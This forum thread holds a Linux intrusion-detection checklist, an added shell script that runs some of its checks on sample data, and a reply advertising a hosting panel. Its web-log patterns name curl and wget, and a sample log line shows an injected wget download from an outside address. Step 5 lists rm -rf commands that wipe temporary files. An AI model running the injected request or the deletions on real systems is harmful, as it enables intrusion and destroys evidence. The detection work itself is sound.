How-to detect a possible intruder ¿? (Linux Server)

  • siosios (g0d!, Kung Fu Master; joined Oct 2006; 13626 posts)

    #1

    How-to detect a possible intruder ¿? (Linux Server)

    Advice: these are steps compiled from the network and from some books; they were not done by me.

    Hello..

    I have a few incomplete steps to see if I have an intruder in my Linux system, but I would really like to have all your suggestions to make a good doc about this matter, so please post your tips and tricks about this subject.

    1.- Download and run Rkhunter & Chkrootkit
    2.- Run "w", and "netstat -nalp | grep SSHPORTHERE" to see who's connected using SSH
    3.- Search for ssh and ftp accepted logins.

    Code:
    last
    cat /var/log/secure* | grep ssh | grep Accept
    cat /var/log/secure* | grep ftp | grep Accept
    less /var/log/messages | grep ftp
    4.- Watch current connections and scan your ports.

    Code:
    netstat -nalp
    nmap -p 1-65535 localhost
    5.- Search for suspicious content in common exploitable dirs.

    Code:
    rm -rf /tmp/sess*
    rm -rf /var/dos-*
    rm -rf /var/tmp/ssh-*
    rm -rf /var/tmp/dos-*
    ls /tmp -lab
    ls /var/tmp -labR
    ls /dev/shm -labR
    ls /usr/local/apache/proxy -labR
    ls /usr/local/samba -labR
    6.- Check for anomalies in these files.

    Code:
    less /etc/passwd
    less /etc/shadow
    less /etc/group
    7.- Search for new users in sudoers, check wtmp, and check that telnet is not running.

    Code:
    cat /etc/sudoers
    who /var/log/wtmp
    cat /etc/xinetd.d/telnet
    8.- Find bash history files

    Code:
    find / -iname .bash_history
    9.- Verify the crontab table

    Code:
    crontab -l
    10.- Update the slocate database and search for exploits.

    Code:
    updatedb &
    For cPanel servers:

    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
    For Ensim servers:

    Code:
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*
    Search for shell code:

    Code:
    # Apache writes non-printable request bytes as \xNN, so look for a literal "\x90" (NOP sled marker)
    cat /path/of/your/web/logs/* | grep -F '\x90'
    11.- Search for hidden dirs

    Code:
    locate "..."
    locate ".. "
    locate " .."
    locate ". "
    locate " ."
    12.- Search for perl scripts running

    Code:
    ps aux | grep perl
    13.- Check the nobody user and open files.

    Code:
    service httpd stop
    lsof -u nobody
    Please, add your tips and tricks about this.
    Last edited by siosios; 12-08-2008, 06:00 PM.
    ------------------------------------------
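    The checklist above is a set of commands typed one at a time; the script below, an added example that is not part of the original post, turns a few of those checks (steps 3, 6, 9, 10 and 11) into small shell functions and runs them over constructed sample files in a temporary directory, so it runs offline and can be compared against known expected findings. The log lines, passwd entries, crontab and directory names are all made up for the example (documentation address ranges, a fake "toor" UID 0 account, a cron job living in /dev/shm); on a real server the functions would be pointed at /var/log/secure, /etc/passwd, the output of crontab -l, the web logs and /tmp.

```shell
#!/bin/sh
# Added example, not from the original post: a few of the checklist's checks as
# shell functions over CONSTRUCTED sample data, so the script is self-contained.
# On a real server pass the real files (/var/log/secure, /etc/passwd, ...).

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# --- constructed sample data (documentation ranges, not real hosts) ---
cat >"$WORK/secure" <<'EOF'
Dec  8 17:01:12 host sshd[2211]: Accepted password for root from 203.0.113.7 port 4412 ssh2
Dec  8 17:02:03 host sshd[2215]: Failed password for invalid user admin from 198.51.100.9 port 5010 ssh2
Dec  8 17:05:44 host sshd[2230]: Accepted publickey for deploy from 192.0.2.10 port 51022 ssh2
EOF

cat >"$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
deploy:x:1001:1001::/home/deploy:/bin/bash
toor:x:0:0::/root:/bin/bash
EOF

cat >"$WORK/crontab" <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /dev/shm/.x/run >/dev/null 2>&1
EOF

cat >"$WORK/access_log" <<'EOF'
203.0.113.7 - - [08/Dec/2008:17:10:01 +0000] "GET /index.php?cmd=wget%20http://198.51.100.5/x HTTP/1.1" 200 512
192.0.2.10 - - [08/Dec/2008:17:11:45 +0000] "GET /about.html HTTP/1.1" 200 2048
203.0.113.7 - - [08/Dec/2008:17:12:09 +0000] "POST /cgi-bin/test.cgi HTTP/1.1" 500 0 "\x90\x90\x90"
EOF

# Two legitimate directories and two with names made only of dots and spaces.
mkdir -p "$WORK/tmp/.normal" "$WORK/tmp/sess_ok" "$WORK/tmp/..." "$WORK/tmp/ .."

# Step 3: accepted SSH logins as "user address" pairs, one per line.
accepted_logins() {
    awk '/sshd\[.*\]: Accepted/ {
        for (i = 1; i <= NF; i++) { if ($i == "for") u = $(i+1); if ($i == "from") h = $(i+1) }
        print u, h
    }' "$1"
}

# Step 6: accounts other than root that carry UID 0 (a classic backdoor sign).
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Step 9: cron entries that run out of world-writable dirs or pipe a download into a shell.
suspicious_cron() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" \
      | grep -E '/tmp/|/var/tmp/|/dev/shm/|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' || true
}

# Step 10: the post's web-log pattern, plus a literal "\x90" as Apache escapes it.
weblog_hits() {
    grep -Ei '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20|\\x90' "$1" || true
}

# Step 11: directories whose name consists only of dots and spaces ("...", " ..", ". ").
hidden_dirs() {
    find "$1" -type d 2>/dev/null | grep -E '/[. ]+$' || true
}

# Print one report section per check so the output reads like the checklist.
run_audit() {
    echo "== accepted SSH logins ==";   accepted_logins "$WORK/secure"
    echo "== extra UID 0 accounts =="; extra_uid0 "$WORK/passwd"
    echo "== suspicious cron ==";      suspicious_cron "$WORK/crontab"
    echo "== web log hits ==";         weblog_hits "$WORK/access_log"
    echo "== hidden dirs ==";          hidden_dirs "$WORK/tmp"
}

run_audit
```

    Each function prints only its findings and exits 0, so the report can be diffed from one run to the next or fed to a mail job; a hit from extra_uid0 or suspicious_cron is the kind of thing that should stop you before running the rm -rf lines in step 5, since those wipe the very files you would want to examine.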
  • w4d (Inactive; joined Sep 2007; 27 posts)

    #2
    Very nice, Sios. Linux ftw.

    Oh by the way, if you plan on making a hosting company or know a hosting company, give them this: http://www.corecp.com

    We just opened our BETA friday and we're all excited about it. It's gonna be ownage. ^_^
    AKA suttoN on the n/u servers
